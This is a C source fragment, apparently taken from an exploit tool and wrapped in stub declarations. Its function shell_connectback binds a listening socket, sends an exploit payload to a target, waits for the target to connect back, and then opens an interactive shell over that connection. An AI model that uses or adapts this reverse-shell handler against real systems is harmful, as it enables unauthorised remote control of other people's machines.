
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int fflush (int ) ;
 int perror (char*) ;
 int printf (char*) ;
 int shell (int) ;
 int sock_accept (int) ;
 scalar_t__ sock_bind (int,long,int) ;
 int sock_disconnect (int) ;
 scalar_t__ sock_send_payload (long,int,char*,int) ;
 int sock_tcp_create () ;
 int stdout ;

__attribute__((used)) static void
shell_connectback (long host, int port, long dest,
     char *packet, int packet_len)
{
    int sock;
    int new_sock;

    sock = sock_tcp_create ();
    if (sock < 0)
    {
 perror ("[-] Error creating socket");
 return;
    }




    if (sock_bind (sock, host, port) < 0)
    {
 perror ("[-] Unable to bind/listen");
 return;
    }

    if (sock_send_payload (dest, port, packet, packet_len) < 0)
    {
 perror ("[-] Unable to send payload");
 return;
    }

    printf ("[-] Waiting 10s for incoming connection (connectback)...\n");
    fflush (stdout);

    new_sock = sock_accept (sock);
    if (new_sock < 0)
    {
 perror ("[-] Unable to accept connection");
 return;
    }

    sock_disconnect (sock);

    shell (new_sock);
    sock_disconnect (new_sock);
}
